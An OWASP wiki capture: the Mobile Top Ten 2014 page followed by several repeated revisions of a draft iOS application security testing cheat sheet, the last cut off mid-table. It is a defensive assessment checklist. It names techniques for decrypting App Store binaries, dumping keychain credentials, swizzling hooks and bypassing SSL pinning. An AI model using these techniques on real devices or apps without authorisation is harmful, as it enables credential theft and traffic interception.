<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
== About this list ==
In 2013, we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our goals for the 2014 list included the following:
[[File:2014-01-26 20-23-29.png|right|550px]]
* Updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc;
* Generation of more data; and
* A PDF release.

This list has been finalized after a 90-day feedback period from the community. Based on feedback, we intend on releasing a Mobile Top Ten 2015 list following a similar approach of collecting data, grouping the data in logical and consistent ways.

Feel free to visit [https://groups.google.com/a/owasp.org/forum/#!forum/owasp-mobile-top-10-risks the mailing list] as well!

== Call to Action for 2015 ==
We are currently looking for vendors, consultants, or other industry experts within the appsec community that are willing to participate in the OWASP Mobile Top Ten 2015. Participation could include any of the following: gathering data, promoting awareness, etc.

We have published a [https://docs.google.com/viewer?a=v&pid=forums&srcid=MTM2MzA3NTkyMzA4NjgxNjcwNjQBMTU5NDg1NTE3NTg0NTgyOTMzOTgBUmEtcUZEUFNUVzRKATAuMQFvd2FzcC5vcmcBdjI Call for Data document] and have also (in the name of transparency) [https://docs.google.com/spreadsheets/d/16bW_VhEIlFU4cfN8BOOk40-XN93FM0f0Sxcx67NwPcg/edit?usp=sharing published a document] which lists which entities/vendors/individuals/etc that we have reached out to. These requests were made because we know these companies to be thought leaders in the mobile application space. If we missed you, and you have data or feedback to contribute, we aplogize and please email one of us!

== Top 10 Mobile Risks - Final List 2014 ==
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads, Credit, and Contributions ==

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

== Project Methodology ==

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

== Archive ==
* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  
** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]
__NOTOC__

IOS Application Security Testing Cheat Sheet

2014-08-03T10:53:28Z

Jason Haddix:

== DRAFT CHEAT SHEET - WORK IN PROGRESS ==

== Introduction ==

<p>This cheat sheet provides a checklist of tasks to be performed when testing an iOS application.</p>
<p>When assessing a mobile application several areas should be taken into account: client software, the communication channel and the server side infrastructure.</p>
<p>Testing an iOS application usually requires a jailbroken device. (A device that not pose any restrictions on the software that can be installed on it.)</p>

[[File:2-18-2013 4-47-36 AM.png]]

== Information gathering ==
<ul>
<li>Observe application behavior</li>
<li>Determine the application’s data states (at rest, in transit or on display) and sensitivity </li>
<li>Identify access methods</li>
<li>Identify what frameworks are in use</li>
<li>Identify server side APIs that are in use</li>
<li>Identify what protocols are in use</li>
<li>Identify other applications or services with which the application interacts</li>
<li>Decrypt Appstore binaries: the .ipa will be decrypted at runtime by the kernel’s mach loader. Cydia has several applications available: Crackulous, AppCrack and Clutch. Also, you can use GDB. The “cryptid” field of the LC_ENCRYPTION_INFO identifies if the application is encrypted or not. Use otool –l <app name> | grep –A 4 LC_ENCRYPTION_INFO</li>
<li>Determine the architecture the application was compiled for: otool –f <app name> or lipo -info <app>.</li>
<li>Get information about what functions, classes and methods are referenced in the application and in the dynamically loaded libraries. Use nm <app name></li>
<li>List the dynamic dependencies. Use otool –L <app name>
<li>Dump the load commands for the application. Use otool –l <app name></li>
<li>Dump the runtime information from the compiled application. Identify each class compiled into the program and its associated methods, instance variables and properties. Use class-dump-z <app name>. That can be put that into a .h file which can be used later to create hooks for method swizzling or to simply make the methods of the app easier to read.</li>
<li>Dump the keychain using dump_keychain to reveal application specific credentials and passwords if stored in the keychain. </li>
</ul>
Determine the security features in place:
<ul>
<li>Locate the PIE (Position Independent Executable) - an app compiled without PIE (using the “–fPIE –pie” flag) will load the executable at a fixed address. Check this using the command: otool –hv <app name></li>
<li>Stack smashing protection - specify the –fstack-protector-all compiler flag. A “canary” is placed on the stack to protect the saved base pointer, saved instruction pointer and function arguments. It will be verified upon the function return to see if it has been overwritten. Check this using: otool –I –v <app name> | grep stack . If the application was compiled with the stack smashing protection two undefined symbols will be present: “___stack_chk_fail” and “___stack_chk_guard”.</li>
</ul>

== Application traffic analysis ==
<ul>
<li>Analyze error messages</li>
<li>Analyze cacheable information</li>
<li>Transport layer security (TLS version; NSURLRequest object )</li>
<li>Attack XML processors</li>
<li>SQL injection</li>
<li>Privacy issues (sensitive information disclosure)</li>
<li>Improper session handling</li>
<li>Decisions via untrusted inputs</li>
<li>Broken cryptography</li>
<li>Unmanaged code</li>
<li>URL Schemes</li>
<li>Push notifications</li>
<li>Authentication</li>
<li>Authorization</li>
<li>Session management</li>
<li>Data storage</li>
<li>Data validation (input, output)</li>
<li>Transport Layer protection – are the certificates validated, does the application implement Certificate Pinning</li>
<li>Denial of service</li>
<li>Business logic</li>
<li>UDID or MAC ID usage (privacy concerns)</li>
</ul>

== Runtime analysis ==
<ul>
<li>Disassemble the application (gdb)</li>
<li>Analyze file system interaction</li>
<li>Use the .h file generated with class-dump-z to create a method swizzling hook of some interesting methods to either examine the data as it flow through or create a "stealer" app.</li>
<li>Analyze the application with a debugger (gdb): inspecting objects in memory and calling functions and methods; replacing variables and methods at runtime.</li>
<li>Investigate CFStream and NSStream</li>
<li>Investigate protocol handlers (application: openURL - validates the source application that instantiated the URL request) for example: try to reconfigure the default landing page for the application using a malicious iframe.</li>
<li>Buffer overflows and memory corruption</li>
<li>Client side injection</li>
<li>Runtime injections</li>
<li>Having access to sources, test the memory by using Xcode Schemes</li>
</ul>

== Insecure data storage ==
<ul>
<li>Investigate log files(plugging the device in and pulling down logs with Xcode Organizer)</li>
<li>Insecure data storage in application folder (var/mobile/Applications), caches, in backups (iTunes)</li>
<li>Investigate custom created files</li>
<li>Analyze SQLlite database</li>
<li>Investigate property list files</li>
<li>Investigate file caching</li>
<li>Insecure data storage in keyboard cache</li>
<li>Investigate Cookies.binarycookies</li>
<li>Analyze iOS keychain (/private/var/Keychains/keychain-2.db) – when it is accessible and what information it contains; data stored in the keychain can only be accessible if the attacker has physical access to the device.</li>
<li>Check for sensitive information in snapshots</li>
<li>Audit data protection of files and keychain entries (To determine when a keychain item should be readable by an application check the data protection accessibility constants)</li>
</ul>

== Tools ==
<table border=1>
<tr>
<th>Tool</th>
<th>Link</th>
<th>Description</th>
</tr>
<tr>
<td>Mallory proxy</td>
<td>http://intrepidusgroup.com/insight/mallory/</td>
<td>Proxy for Binary protocols</td>
</tr>
<tr>
<td>Charles/Burp proxy</td>
<td>http://www.charlesproxy.com/ ;
http://www.portswigger.net/burp/
</td>
<td>Proxy for HTTP and HTTPS</td>
</tr>
<tr>
<td>OpenSSH</td>
<td>http://www.openssh.com/</td>
<td>Connect to the iPhone remotely over SSH</td>
</tr>
<tr>
<td>Sqlite3</td>
<td>http://www.sqlite.org/</td>
<td>Sqlite database client</td>
</tr>
<tr>
<td>GNU Debugger</td>
<td>http://www.gnu.org/software/gdb/</td>
<td>For run time analysis & reverse engineering</td>
</tr>
<tr>
<td>Syslogd</td>
<td>https://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/syslogd.8.html</td>
<td>View iPhone logs</td>
</tr>
<tr>
<td>Tcpdump</td>
<td>http://www.tcpdump.org/</td>
<td>Capture network traffic on phone</td>
</tr>
<tr>
<td>Otool</td>
<td>http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html</td>
<td>Odcctools: otool – object file displaying tool</td>
</tr>
<tr>
<td>Cycript </td>
<td>http://www.cycript.org/</td>
<td>A language designed to interact with Objective-C classes</td>
</tr>
<tr>
<td>SSL Kill switch</td>
<td>https://github.com/iSECPartners/ios-ssl-kill-switch</td>
<td>Blackbox tool to disable SSL certificate validation - including certificate pinning in NSURL </td>
</tr>
<tr>
<td>Plutil</td>
<td>http://scw.us/iPhone/plutil/</td>
<td>To view Plist files</td>
</tr>
<tr>
<td>nm</td>
<td></td>
<td>Analysis tool to display the symbol table, which includes names of functions and methods, as well as their load addresses.</td>
</tr>
<tr>
<td>sysctl</td>
<td>https://developer.apple.com/library/mac/#documentation/Darwin/Reference /ManPages/man8/sysctl.8.html</td>
<td>A utility to read and change kernel state variables</td>
</tr>
<tr>
<td>dump_keychain</td>
<td>https://github.com/emonti/iOS_app_re_tools </td>
<td>A utility to dump the keychain</td>
</tr>
<tr>
<td>Filemon</td>
<td>http://www.newosxbook.com/files/filemon.iOS</td>
<td>Monitor realtime iOS file system</td>
</tr>
<tr>
<td>FileDP</td>
<td>http://www.securitylearn.net/2012/10/18/extracting-data-protection-class-from-files-on-ios/</td>
<td>Audits data protection of files</td>
</tr>
<tr>
<td>BinaryCookieReader</td>
<td>http://securitylearn.net/wp-content/uploads/tools/iOS/BinaryCookieReader.py</td>
<td>Read cookies.binarycookies files </td>
</tr>
<tr>
<td>lsof ARM Binary</td>
<td>https://github.com/u35tpus/iosrep/tree/master/lsof</td>
<td> list of all open files and the processes that opened them </td>
</tr>
<tr>
<td>lsock ARM Binary</td>
<td>http://www.newosxbook.com/index.php?page=downloads</td>
<td> monitor socket connections </td>
</tr>
<tr>
<td>PonyDebugger Injected</td>
<td>https://github.com/dtrukr/PonyDebuggerInjected</td>
<td> Injected via Cycript to enable remote debugging </td>
</tr>
<tr>
<td>Weak Class Dump</td>
<td>https://raw.github.com/limneos/weak_classdump/master/weak_classdump.cy</td>
<td> Injected via Cycript to do class-dump (for when you cant un-encrypt the binary) </td>
</tr>
<tr>
<td>TrustME</td>
<td>https://github.com/intrepidusgroup/trustme</td>
<td> Lower level tool to disable SSL certificate validation - including certificate pinning (for everything else but NSURL)</td>
</tr>
<tr>
<td>Mac Robber</td>
<td>http://www.sleuthkit.org/mac-robber/download.php</td>
<td> C code, forensic tool for imaging filesystems and producing a timeline </td>
</tr>
<tr>
<td>USBMux Proxy</td>
<td>https://github.com/st3fan/usbmux-proxy</td>
<td> command line tool to connect local TCP port sto ports on an iPhone or iPod Touch device over USB. </td>
</tr>
<tr>
<td>iFunBox</td>
<td>http://www.i-funbox.com/</td>
<td>Filesystem access (no jailbreak needed), USBMux Tunneler, .ipa installer</td>
</tr>
<tr>
<td>iNalyzer</td>
<td>https://appsec-labs.com/iNalyzer/</td>
<td>iOS Penetration testing framework</td>
</tr>
<tr>
<td>removePIE</td>
<td>https://github.com/peterfillmore/removePIE</td>
<td>Disables ASLR of an application</td>
</tr>
<tr>
<td>snoop-it</td>
<td>https://code.google.com/p/snoop-it/</td>
<td>A tool to assist security assessments and dynamic analysis of iOS Apps, includes runtime views of obj-c classes and methods, and options to modify those values</td>
</tr>
<tr>
<td>idb</td>
<td>https://github.com/dmayer/idb</td>
<td>A GUI (and cmdline) tool to simplify some common tasks for iOS pentesting and research.</td>
</tr>
<tr>
<td>Damn Vulnerable iOS Application</td>
<td>http://damnvulnerableiosapp.com/</td>
<td>A purposefully vulnerable iOS application for learning iOS application assessment skills.</td>
</tr>
<tr>
<td>introspy</td>
<td>https://github.com/iSECPartners/Introspy-iOS</td>
<td>A security profiling tool revolved around hooking security based iOS APIs and logging their output for security analysis</td>
</tr>
</table>

== Related Articles ==
<ul>
<li>http://www.slideshare.net/jasonhaddix/pentesting-ios-applications</li>
<li>https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide</li>
<li>http://pen-testing.sans.org/blog/pen-testing/2011/10/13/mobile-application-assessments-attack-vectors-and-arsenal-inventory#</li>
<li>http://www.securitylearn.net/2012/09/07/penetration-testing-of-iphone-applications-part-3/</li>
<li>Jonathan Zdziarski “Hacking and securing iOS applications” (ch. 6,7,8)</li>
<li>http://www.mdsec.co.uk/research/iOS_Application_Insecurity_wp_v1.0_final.pdf</li>
</ul>

= Authors and Primary Editors =
Oana Cornea - oanacornea123[at]gmail.com

Jason Haddix - jason.haddix[at]hp.com

= Other Cheatsheets =
{{Cheatsheet_Navigation}}

[[Category:Cheatsheets]]

IOS Application Security Testing Cheat Sheet

2014-08-03T10:48:52Z

Jason Haddix:

== DRAFT CHEAT SHEET - WORK IN PROGRESS ==

== Introduction ==

<p>This cheat sheet provides a checklist of tasks to be performed when testing an iOS application.</p>
<p>When assessing a mobile application several areas should be taken into account: client software, the communication channel and the server side infrastructure.</p>
<p>Testing an iOS application usually requires a jailbroken device. (A device that not pose any restrictions on the software that can be installed on it.)</p>

[[File:2-18-2013 4-47-36 AM.png]]

== Information gathering ==
<ul>
<li>Observe application behavior</li>
<li>Determine the application’s data states (at rest, in transit or on display) and sensitivity </li>
<li>Identify access methods</li>
<li>Identify what frameworks are in use</li>
<li>Identify server side APIs that are in use</li>
<li>Identify what protocols are in use</li>
<li>Identify other applications or services with which the application interacts</li>
<li>Decrypt Appstore binaries: the .ipa will be decrypted at runtime by the kernel’s mach loader. Cydia has several applications available: Crackulous, AppCrack and Clutch. Also, you can use GDB. The “cryptid” field of the LC_ENCRYPTION_INFO identifies if the application is encrypted or not. Use otool –l <app name> | grep –A 4 LC_ENCRYPTION_INFO</li>
<li>Determine the architecture the application was compiled for: otool –f <app name> or lipo -info <app>.</li>
<li>Get information about what functions, classes and methods are referenced in the application and in the dynamically loaded libraries. Use nm <app name></li>
<li>List the dynamic dependencies. Use otool –L <app name>
<li>Dump the load commands for the application. Use otool –l <app name></li>
<li>Dump the runtime information from the compiled application. Identify each class compiled into the program and its associated methods, instance variables and properties. Use class-dump-z <app name>. That can be put that into a .h file which can be used later to create hooks for method swizzling or to simply make the methods of the app easier to read.</li>
<li>Dump the keychain using dump_keychain to reveal application specific credentials and passwords if stored in the keychain. </li>
</ul>
Determine the security features in place:
<ul>
<li>Locate the PIE (Position Independent Executable) - an app compiled without PIE (using the “–fPIE –pie” flag) will load the executable at a fixed address. Check this using the command: otool –hv <app name></li>
<li>Stack smashing protection - specify the –fstack-protector-all compiler flag. A “canary” is placed on the stack to protect the saved base pointer, saved instruction pointer and function arguments. It will be verified upon the function return to see if it has been overwritten. Check this using: otool –I –v <app name> | grep stack . If the application was compiled with the stack smashing protection two undefined symbols will be present: “___stack_chk_fail” and “___stack_chk_guard”.</li>
</ul>

== Application traffic analysis ==
<ul>
<li>Analyze error messages</li>
<li>Analyze cacheable information</li>
<li>Transport layer security (TLS version; NSURLRequest object )</li>
<li>Attack XML processors</li>
<li>SQL injection</li>
<li>Privacy issues (sensitive information disclosure)</li>
<li>Improper session handling</li>
<li>Decisions via untrusted inputs</li>
<li>Broken cryptography</li>
<li>Unmanaged code</li>
<li>URL Schemes</li>
<li>Push notifications</li>
<li>Authentication</li>
<li>Authorization</li>
<li>Session management</li>
<li>Data storage</li>
<li>Data validation (input, output)</li>
<li>Transport Layer protection – are the certificates validated, does the application implement Certificate Pinning</li>
<li>Denial of service</li>
<li>Business logic</li>
<li>UDID or MAC ID usage (privacy concerns)</li>
</ul>

== Runtime analysis ==
<ul>
<li>Disassemble the application (gdb)</li>
<li>Analyze file system interaction</li>
<li>Use the .h file generated with class-dump-z to create a method swizzling hook of some interesting methods to either examine the data as it flow through or create a "stealer" app.</li>
<li>Analyze the application with a debugger (gdb): inspecting objects in memory and calling functions and methods; replacing variables and methods at runtime.</li>
<li>Investigate CFStream and NSStream</li>
<li>Investigate protocol handlers (application: openURL - validates the source application that instantiated the URL request) for example: try to reconfigure the default landing page for the application using a malicious iframe.</li>
<li>Buffer overflows and memory corruption</li>
<li>Client side injection</li>
<li>Runtime injections</li>
<li>Having access to sources, test the memory by using Xcode Schemes</li>
</ul>

== Insecure data storage ==
<ul>
<li>Investigate log files(plugging the device in and pulling down logs with Xcode Organizer)</li>
<li>Insecure data storage in application folder (var/mobile/Applications), caches, in backups (iTunes)</li>
<li>Investigate custom created files</li>
<li>Analyze SQLlite database</li>
<li>Investigate property list files</li>
<li>Investigate file caching</li>
<li>Insecure data storage in keyboard cache</li>
<li>Investigate Cookies.binarycookies</li>
<li>Analyze iOS keychain (/private/var/Keychains/keychain-2.db) – when it is accessible and what information it contains; data stored in the keychain can only be accessible if the attacker has physical access to the device.</li>
<li>Check for sensitive information in snapshots</li>
<li>Audit data protection of files and keychain entries (To determine when a keychain item should be readable by an application check the data protection accessibility constants)</li>
</ul>

== Tools ==
<table border=1>
<tr>
<th>Tool</th>
<th>Link</th>
<th>Description</th>
</tr>
<tr>
<td>Mallory proxy</td>
<td>http://intrepidusgroup.com/insight/mallory/</td>
<td>Proxy for Binary protocols</td>
</tr>
<tr>
<td>Charles/Burp proxy</td>
<td>http://www.charlesproxy.com/ ;
http://www.portswigger.net/burp/
</td>
<td>Proxy for HTTP and HTTPS</td>
</tr>
<tr>
<td>OpenSSH</td>
<td>http://www.openssh.com/</td>
<td>Connect to the iPhone remotely over SSH</td>
</tr>
<tr>
<td>Sqlite3</td>
<td>http://www.sqlite.org/</td>
<td>Sqlite database client</td>
</tr>
<tr>
<td>GNU Debugger</td>
<td>http://www.gnu.org/software/gdb/</td>
<td>For run time analysis & reverse engineering</td>
</tr>
<tr>
<td>Syslogd</td>
<td>https://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/syslogd.8.html</td>
<td>View iPhone logs</td>
</tr>
<tr>
<td>Tcpdump</td>
<td>http://www.tcpdump.org/</td>
<td>Capture network traffic on phone</td>
</tr>
<tr>
<td>Otool</td>
<td>http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html</td>
<td>Odcctools: otool – object file displaying tool</td>
</tr>
<tr>
<td>Cycript </td>
<td>http://www.cycript.org/</td>
<td>A language designed to interact with Objective-C classes</td>
</tr>
<tr>
<td>SSL Kill switch</td>
<td>https://github.com/iSECPartners/ios-ssl-kill-switch</td>
<td>Blackbox tool to disable SSL certificate validation - including certificate pinning in NSURL </td>
</tr>
<tr>
<td>Plutil</td>
<td>http://scw.us/iPhone/plutil/</td>
<td>To view Plist files</td>
</tr>
<tr>
<td>nm</td>
<td></td>
<td>Analysis tool to display the symbol table, which includes names of functions and methods, as well as their load addresses.</td>
</tr>
<tr>
<td>sysctl</td>
<td>https://developer.apple.com/library/mac/#documentation/Darwin/Reference /ManPages/man8/sysctl.8.html</td>
<td>A utility to read and change kernel state variables</td>
</tr>
<tr>
<td>dump_keychain</td>
<td>https://github.com/emonti/iOS_app_re_tools </td>
<td>A utility to dump the keychain</td>
</tr>
<tr>
<td>Filemon</td>
<td>http://www.newosxbook.com/files/filemon.iOS</td>
<td>Monitor realtime iOS file system</td>
</tr>
<tr>
<td>FileDP</td>
<td>http://www.securitylearn.net/2012/10/18/extracting-data-protection-class-from-files-on-ios/</td>
<td>Audits data protection of files</td>
</tr>
<tr>
<td>BinaryCookieReader</td>
<td>http://securitylearn.net/wp-content/uploads/tools/iOS/BinaryCookieReader.py</td>
<td>Read cookies.binarycookies files </td>
</tr>
<tr>
<td>lsof ARM Binary</td>
<td>https://github.com/u35tpus/iosrep/tree/master/lsof</td>
<td> list of all open files and the processes that opened them </td>
</tr>
<tr>
<td>lsock ARM Binary</td>
<td>http://www.newosxbook.com/index.php?page=downloads</td>
<td> monitor socket connections </td>
</tr>
<tr>
<td>PonyDebugger Injected</td>
<td>https://github.com/dtrukr/PonyDebuggerInjected</td>
<td> Injected via Cycript to enable remote debugging </td>
</tr>
<tr>
<td>Weak Class Dump</td>
<td>https://raw.github.com/limneos/weak_classdump/master/weak_classdump.cy</td>
<td> Injected via Cycript to do class-dump (for when you cant un-encrypt the binary) </td>
</tr>
<tr>
<td>TrustME</td>
<td>https://github.com/intrepidusgroup/trustme</td>
<td> Lower level tool to disable SSL certificate validation - including certificate pinning (for everything else but NSURL)</td>
</tr>
<tr>
<td>Mac Robber</td>
<td>http://www.sleuthkit.org/mac-robber/download.php</td>
<td> C code, forensic tool for imaging filesystems and producing a timeline </td>
</tr>
<tr>
<td>USBMux Proxy</td>
<td>https://github.com/st3fan/usbmux-proxy</td>
<td> command line tool to connect local TCP port sto ports on an iPhone or iPod Touch device over USB. </td>
</tr>
<tr>
<td>iFunBox</td>
<td>http://www.i-funbox.com/</td>
<td>Filesystem access (no jailbreak needed), USBMux Tunneler, .ipa installer</td>
</tr>
<tr>
<td>iNalyzer</td>
<td>https://appsec-labs.com/iNalyzer/</td>
<td>iOS Penetration testing framework</td>
</tr>
<tr>
<td>removePIE</td>
<td>https://github.com/peterfillmore/removePIE</td>
<td>Disables ASLR of an application</td>
</tr>
<tr>
<td>snoop-it</td>
<td>https://code.google.com/p/snoop-it/</td>
<td>A tool to assist security assessments and dynamic analysis of iOS Apps, includes runtime views of obj-c classes and methods, and options to modify those values</td>
</tr>
<tr>
<td>idb</td>
<td>https://github.com/dmayer/idb</td>
<td>A GUI (and cmdline) tool to simplify some common tasks for iOS pentesting and research.</td>
</tr>
<tr>
<td>Damn Vulnerable iOS Application</td>
<td>http://damnvulnerableiosapp.com/</td>
<td>A purposefully vulnerable iOS application for learning iOS application assessment skills.</td>
</tr>
</table>

== Related Articles ==
<ul>
<li>http://www.slideshare.net/jasonhaddix/pentesting-ios-applications</li>
<li>https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing_Guide</li>
<li>http://pen-testing.sans.org/blog/pen-testing/2011/10/13/mobile-application-assessments-attack-vectors-and-arsenal-inventory#</li>
<li>http://www.securitylearn.net/2012/09/07/penetration-testing-of-iphone-applications-part-3/</li>
<li>Jonathan Zdziarski “Hacking and securing iOS applications” (ch. 6,7,8)</li>
<li>http://www.mdsec.co.uk/research/iOS_Application_Insecurity_wp_v1.0_final.pdf</li>
</ul>

= Authors and Primary Editors =
Oana Cornea - oanacornea123[at]gmail.com

Jason Haddix - jason.haddix[at]hp.com

= Other Cheatsheets =
{{Cheatsheet_Navigation}}

[[Category:Cheatsheets]]

IOS Application Security Testing Cheat Sheet

2014-08-03T10:35:31Z

Jason Haddix:

== DRAFT CHEAT SHEET - WORK IN PROGRESS ==

== Introduction ==

<p>This cheat sheet provides a checklist of tasks to be performed when testing an iOS application.</p>
<p>When assessing a mobile application several areas should be taken into account: client software, the communication channel and the server side infrastructure.</p>
<p>Testing an iOS application usually requires a jailbroken device. (A device that not pose any restrictions on the software that can be installed on it.)</p>

[[File:2-18-2013 4-47-36 AM.png]]

== Information gathering ==
<ul>
<li>Observe application behavior</li>
<li>Determine the application’s data states (at rest, in transit or on display) and sensitivity </li>
<li>Identify access methods</li>
<li>Identify what frameworks are in use</li>
<li>Identify server side APIs that are in use</li>
<li>Identify what protocols are in use</li>
<li>Identify other applications or services with which the application interacts</li>
<li>Decrypt Appstore binaries: the .ipa will be decrypted at runtime by the kernel’s mach loader. Cydia has several applications available: Crackulous, AppCrack and Clutch. Also, you can use GDB. The “cryptid” field of the LC_ENCRYPTION_INFO identifies if the application is encrypted or not. Use otool –l <app name> | grep –A 4 LC_ENCRYPTION_INFO</li>
<li>Determine the architecture the application was compiled for: otool –f <app name> or lipo -info <app>.</li>
<li>Get information about what functions, classes and methods are referenced in the application and in the dynamically loaded libraries. Use nm <app name></li>
<li>List the dynamic dependencies. Use otool –L <app name>
<li>Dump the load commands for the application. Use otool –l <app name></li>
<li>Dump the runtime information from the compiled application. Identify each class compiled into the program and its associated methods, instance variables and properties. Use class-dump-z <app name>. That can be put that into a .h file which can be used later to create hooks for method swizzling or to simply make the methods of the app easier to read.</li>
<li>Dump the keychain using dump_keychain to reveal application specific credentials and passwords if stored in the keychain. </li>
</ul>
Determine the security features in place:
<ul>
<li>Locate the PIE (Position Independent Executable) - an app compiled without PIE (using the “–fPIE –pie” flag) will load the executable at a fixed address. Check this using the command: otool –hv <app name></li>
<li>Stack smashing protection - specify the –fstack-protector-all compiler flag. A “canary” is placed on the stack to protect the saved base pointer, saved instruction pointer and function arguments. It will be verified upon the function return to see if it has been overwritten. Check this using: otool –I –v <app name> | grep stack . If the application was compiled with the stack smashing protection two undefined symbols will be present: “___stack_chk_fail” and “___stack_chk_guard”.</li>
</ul>

== Application traffic analysis ==
<ul>
<li>Analyze error messages</li>
<li>Analyze cacheable information</li>
<li>Transport layer security (TLS version; NSURLRequest object )</li>
<li>Attack XML processors</li>
<li>SQL injection</li>
<li>Privacy issues (sensitive information disclosure)</li>
<li>Improper session handling</li>
<li>Decisions via untrusted inputs</li>
<li>Broken cryptography</li>
<li>Unmanaged code</li>
<li>URL Schemes</li>
<li>Push notifications</li>
<li>Authentication</li>
<li>Authorization</li>
<li>Session management</li>
<li>Data storage</li>
<li>Data validation (input, output)</li>
<li>Transport Layer protection – are the certificates validated, does the application implement Certificate Pinning</li>
<li>Denial of service</li>
<li>Business logic</li>
<li>UDID or MAC ID usage (privacy concerns)</li>
</ul>

== Runtime analysis ==
<ul>
<li>Disassemble the application (gdb)</li>
<li>Analyze file system interaction</li>
<li>Use the .h file generated with class-dump-z to create a method swizzling hook of some interesting methods to either examine the data as it flow through or create a "stealer" app.</li>
<li>Analyze the application with a debugger (gdb): inspecting objects in memory and calling functions and methods; replacing variables and methods at runtime.</li>
<li>Investigate CFStream and NSStream</li>
<li>Investigate protocol handlers (application: openURL - validates the source application that instantiated the URL request) for example: try to reconfigure the default landing page for the application using a malicious iframe.</li>
<li>Buffer overflows and memory corruption</li>
<li>Client side injection</li>
<li>Runtime injections</li>
<li>Having access to sources, test the memory by using Xcode Schemes</li>
</ul>

== Insecure data storage ==
<ul>
<li>Investigate log files(plugging the device in and pulling down logs with Xcode Organizer)</li>
<li>Insecure data storage in application folder (var/mobile/Applications), caches, in backups (iTunes)</li>
<li>Investigate custom created files</li>
<li>Analyze SQLlite database</li>
<li>Investigate property list files</li>
<li>Investigate file caching</li>
<li>Insecure data storage in keyboard cache</li>
<li>Investigate Cookies.binarycookies</li>
<li>Analyze iOS keychain (/private/var/Keychains/keychain-2.db) – when it is accessible and what information it contains; data stored in the keychain can only be accessible if the attacker has physical access to the device.</li>
<li>Check for sensitive information in snapshots</li>
<li>Audit data protection of files and keychain entries (To determine when a keychain item should be readable by an application check the data protection accessibility constants)</li>
</ul>

== Tools ==
<table border=1>
<tr>
<th>Tool</th>
<th>Link</th>
<th>Description</th>
</tr>
<tr>
<td>Mallory proxy</td>
<td>http://intrepidusgroup.com/insight/mallory/</td>
<td>Proxy for Binary protocols</td>
</tr>
<tr>
<td>Charles/Burp proxy</td>
<td>http://www.charlesproxy.com/ ;
http://www.portswigger.net/burp/
</td>
<td>Proxy for HTTP and HTTPS</td>
</tr>
<tr>
<td>OpenSSH</td>
<td>http://www.openssh.com/</td>
<td>Connect to the iPhone remotely over SSH</td>
</tr>
<tr>
<td>Sqlite3</td>
<td>http://www.sqlite.org/</td>
<td>Sqlite database client</td>
</tr>
<tr>
<td>GNU Debugger</td>
<td>http://www.gnu.org/software/gdb/</td>
<td>For run time analysis & reverse engineering</td>
</tr>
<tr>
<td>Syslogd</td>
<td>https://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/syslogd.8.html</td>
<td>View iPhone logs</td>
</tr>
<tr>
<td>Tcpdump</td>
<td>http://www.tcpdump.org/</td>
<td>Capture network traffic on phone</td>
</tr>
<tr>
<td>Otool</td>
<td>http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html</td>
<td>Odcctools: otool – object file displaying tool</td>
</tr>
<tr>
<td>Cycript </td>
<td>http://www.cycript.org/</td>
<td>A language designed to interact with Objective-C classes</td>
</tr>
<tr>
<td>SSL Kill switch</td>
<td>https://github.com/iSECPartners/ios-ssl-kill-switch</td>
<td>Blackbox tool to disable SSL certificate validation - including certificate pinning in NSURL </td>
</tr>
<tr>
<td>Plutil</td>
<td>http://scw.us/iPhone/plutil/</td>
<td>To view Plist files</td>
</tr>
<tr>
<td>nm</td>
<td></td>
<td>Analysis tool to display the symbol table, which includes names of functions and methods, as well as their load addresses.</td>
</tr>
<tr>
<td>sysctl</td>
<td>https://developer.apple.com/library/mac/#documentation/Darwin/Reference /ManPages/man8/sysctl.8.html</td>
<td>A utility to read and change kernel state variables</td>
</tr>
<tr>
<td>dump_keychain</td>
<td>https://github.com/emonti/iOS_app_re_tools </td>
<td>A utility to dump the keychain</td>
</tr>
